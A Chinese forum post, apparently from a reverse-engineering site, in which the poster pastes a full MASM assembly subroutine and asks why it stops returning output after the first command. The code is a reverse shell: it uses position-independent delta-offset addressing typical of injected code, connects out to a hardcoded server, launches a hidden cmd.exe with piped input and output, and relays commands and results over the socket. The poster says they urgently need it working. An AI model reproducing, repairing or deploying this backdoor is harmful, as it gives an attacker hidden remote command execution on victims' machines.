先附上源代码,整个子函数
-------------------------------------------------------------------------------------------------
_CreateService proc _lParam
LOCAL @stWsa:WSADATA
LOCAL @stSin:sockaddr_in
LOCAL @szBuffer[512]:byte
LOCAL @command[512]:byte
local @hReadPipe1
local @hWritePipe1
local @hReadPipe2
local @hWritePipe2
local @dwCount
local @dwCmdLen
local stSA:SECURITY_ATTRIBUTES
local stStartInfo:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local szBuf1[1024]:byte
LOCAL szBuf2[1024]:byte
pushad
call @F
@@:
pop ebx
sub ebx,offset @B
lea eax,@stWsa
push eax
push 101h
call _WSAStartup[ebx]
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
mov hSocket[ebx],eax
push sizeof @stSin
lea eax,@stSin
push eax
call _RtlZeroMemory[ebx]
push TCP_PORT
call _htons[ebx]
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
lea eax,[offset szServer+ebx]
push eax
call _inet_addr[ebx]
.if eax == INADDR_NONE
jmp _Ret
.endif
mov @stSin.sin_addr,eax
push sizeof @stSin
lea eax,@stSin
push eax
push hSocket[ebx]
call _connect[ebx]
.if eax == SOCKET_ERROR
jmp _Ret
.endif
;push sizeof @szBuffer
;lea eax,@szBuffer
;push eax
;call _RtlZeroMemory[ebx]
;mov ecx,sizeof szMsg
;lea esi,[offset szMsg+ebx]
;lea edi,@szBuffer
;rep movsb
;push 0
;push sizeof szMsg
;lea eax,[offset szMsg+ebx]
;push eax
;push hSocket[ebx]
;call _send[ebx]
Mov stSA.nLength,12
Mov stSA.lpSecurityDescriptor,NULL
Mov stSA.bInheritHandle,TRUE
push 0
lea eax,stSA
push eax
lea eax,@hWritePipe1
push eax
lea eax,@hReadPipe1
push eax
call _CreatePipe[ebx]
push 0
lea eax,stSA
push eax
lea eax,@hWritePipe2
push eax
lea eax,@hReadPipe2
push eax
call _CreatePipe[ebx]
push sizeof STARTUPINFO
lea eax,stStartInfo
push eax
call _RtlZeroMemory[ebx]
Mov stStartInfo.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
Mov stStartInfo.wShowWindow,SW_HIDE
Mov eax,@hReadPipe1
Mov stStartInfo.hStdInput,eax
Mov eax,@hWritePipe2
Mov stStartInfo.hStdOutput,eax
Mov stStartInfo.hStdError,eax
lea eax,stProcInfo
push eax
lea eax,stStartInfo
push eax
push NULL
push NULL
push 0
push 1
push NULL
push NULL
lea eax,[offset szCmd+ebx]
push eax
push NULL
call _CreateProcess[ebx]
.while TRUE
.while TRUE
mov @dwCount,0
push 1024
lea eax,szBuf1
push eax
call _RtlZeroMemory[ebx]
.while @dwCount == 0
push NULL
push NULL
lea eax,@dwCount
push eax
push 1024
lea eax,szBuf1
push eax
push @hReadPipe2
call _PeekNamedPipe[ebx]
.endw
push NULL
lea eax,@dwCount
push eax
push 1024
lea eax,szBuf1
push eax
push @hReadPipe2
call _ReadFile[ebx]
push 0
push @dwCount
lea eax,szBuf1
push eax
push hSocket[ebx]
call _send[ebx]
.break .if eax<=0
mov ecx,@dwCount
dec ecx
.break .if byte ptr[szBuf1+ecx]==62
.endw
push 0
push sizeof szEnd
lea eax,[offset szEnd+ebx]
push eax
push hSocket[ebx]
call _send[ebx]
push 1024
lea eax,szBuf2
push eax
call _RtlZeroMemory[ebx]
push 0
push 1024
lea eax,szBuf2
push eax
push hSocket[ebx]
call _recv[ebx]
.if eax == SOCKET_ERROR || eax == 0
call _WSAGetLastError[ebx]
.if eax == WSAEWOULDBLOCK
.continue
.else
push 0
push stProcInfo.hProcess
call _TerminateProcess[ebx]
.break
.endif
.else
mov @dwCmdLen,eax
push NULL
lea eax,@dwCount
push eax
push @dwCmdLen
lea eax,szBuf2
push eax
push @hWritePipe1
call _WriteFile[ebx]
push 0
push @dwCount
lea eax,szBuf2
push eax
push hSocket[ebx]
call _send[ebx]
lea eax,szBuf2
lea edx,[offset szExit+ebx]
push eax
push edx
call _lstrcmpi[ebx]
.break .if eax == 0
.endif
.endw
_Ret:
push hSocket[ebx]
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
_CreateService endp
---------------------------------------------------------------------------------------------
第一次从管道中读取数据成功了,我在网络的另一端收到了CMD的初始输出信息,然后我发了一个CMD命令,例如net user过来,这边确实受到了net user这个字符串,并且WriteFile也成功了,返回值是1,返回的写入字节数是8,但是再从管道中读数据,就读不到任何数据了,可能是因为CMD没有执行,但是我检查了几篇前面对CMD输入输出的关联,没有错啊
怨念中,求助!急着要用。。。。
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
